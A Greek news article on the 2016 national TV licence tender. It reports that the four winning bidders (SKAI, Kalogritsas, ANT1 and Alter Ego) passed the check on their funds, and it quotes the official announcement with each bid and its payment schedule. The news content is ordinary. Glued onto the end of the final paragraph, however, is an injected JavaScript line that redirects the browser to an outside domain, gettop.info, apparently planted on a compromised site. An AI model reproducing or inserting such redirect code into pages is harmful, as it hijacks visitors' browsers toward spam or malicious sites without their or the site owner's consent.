Μαρινάκης, Καλογρίτσας, Κυριακού, Αλαφούζος πέρασαν τον έλεγχο πόθεν έσχες

0
43

Και οι τέσσερις νέοι «καναλάρχες» πέρασαν τον έλεγχο του πόθεν έσχες και έτσι τώρα είναι έτοιμοι να πάρουν τις άδειες, εφόσον βέβαια πληρώσουν την πρώτη δόση του συνολικού τιμήματος, το οποίο προσέφεραν στον διαγωνισμό.

Όπως ανακοίνωσε ο ΓΓ Ενημέρωσης και Επικοινωνίας Λευτέρης Κρέτσος «εξετάστηκε από την αρμόδια επιτροπή η προέλευση και ο τρόπος απόκτησης των οικονομικών μέσων που θα διατεθούν». Ο έλεγχος αφορούσε όλα τα ποσά και όχι μόνο την πρώτη δόση.

Σε 15 μέρες θα πρέπει να καταβληθεί η πρώτη από τις τρεις δόσεις των χρημάτων.Έως τις 25 Σεπτεμβρίου θα πρέπει ο ΑΝΤ1 της οικογένειας Κυριακού να καταβάλει 25,3 εκατ. ευρώ, η εταιρεία ALTER EGO του Βαγγέλη Μαρινάκη 23,3 εκατ. ευρώ, η εταιρεία του Βλαδίμηρου Καλογρίτσα 17,3 εκατ. ευρώ και ο ΣΚΑΪ  του Γιάννη Αλαφούζου 14,3 εκατ. ευρώ.

Η ανακοίνωση του κ. Κρέτσου έχει ως εξής:

Με την υπ’ αρ. 239/9-9-2016 απόφαση του Γενικού Γραμματέα Ενημέρωσης

(ΑΔΑ: 7Φ2Ξ465ΙΧΦ-9ΑΛ), ολοκληρώθηκε η διαδικασία αδειοδότησης παρόχων περιεχομένου επίγειας ψηφιακής τηλεοπτικής ευρυεκπομπής ελεύθερης λήψης εθνικής εμβέλειας ενημερωτικού προγράμματος γενικού περιεχομένου, με την οποία ανακηρύχθηκαν ως οριστικοί υπερθεματιστές οι εξής:

1. ΕΙΔΗΣΕΙΣ ΝΤΟΤ ΚΟΜ ΑΝΩΝΥΜΗ ΡΑΔΙΟΤΗΛΕΟΠΤΙΚΗ ΚΑΙ ΕΜΠΟΡΙΚΗ ΕΤΑΙΡΕΙΑ ΠΑΡΟΧΗΣ ΠΛΗΡΟΦΟΡΙΩΝ ΚΑΙ ΕΝΗΜΕΡΩΣΗΣ   (ΣΚΑΙ ΑΕ) με τίμημα € 43.600.000,00.
2. ΙΩΑΝΝΗΣ-ΒΛΑΔΙΜΗΡΟΣ Χ. ΚΑΛΟΓΡΙΤΣΑΣ ΤΗΛΕΟΡΑΣΗ ΠΑΝΕΛΛΑΔΙΚΗΣ ΚΑΛΥΨΗΣ ΜΟΝΟΠΡΟΣΩΠΗ ΑΝΩΝΥΚΗ ΕΤΑΙΡΕΙΑ    (Τ.Π.Κ μ.α.ε) με τίμημα € 52.600.000,00.
3. ΑΝΤΕΝΝΑ TV ΑΝΩΝΥΜΟΣ ΕΤΑΙΡΕΙΑ, με τίμημα € 75.900.000,00.
4. ΑΛΤΕΡ ΕΓΚΟ ΕΠΙΧΕΙΡΗΣΗ ΜΕΣΩΝ ΜΑΖΙΚΗΣ ΕΝΗΜΕΡΩΣΗΣ ΑΝΩΝΥΜΟΣ ΕΤΑΙΡΙΑ (ΑΛΤΕΡ ΕΓΚΟ Μ.Μ.Ε. Α.Ε.), με τίμημα€ 73.900.000,00.

Στους τέσσερις υπερθεματιστές που αναδείχθηκαν, εξετάστηκε από την αρμόδια επιτροπή η προέλευση και ο τρόπος απόκτησης των οικονομικών μέσων που θα διατεθούν, σύμφωνα με όσα ορίζονται στην παράγραφο 8.1 της προκήρυξης. Το συνολικό τίμημα για τις τέσσερις άδεις ανήλθε στο ποσό των 246.000.000€ και σε δεκαπέντε μέρες από την οριστική κατακύρωση οι υπερθεματιστές θα καταβάλουν την πρώτη δόση από τις συνολικά τρείς.

Με την επιτυχημένη ολοκλήρωση της διαδικασίας, διαμορφώνεται πλέον ένα τηλεοπτικό τοπίο βασισμένο στις αρχές της νομιμότητας, μετά από δεκαετίες ενός άναρχου τηλεοπτικού περιβάλλοντος, ενώ το δημόσιο θα εισπράξει ένα πολύ σημαντικό ποσό από την αδειοδότηση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here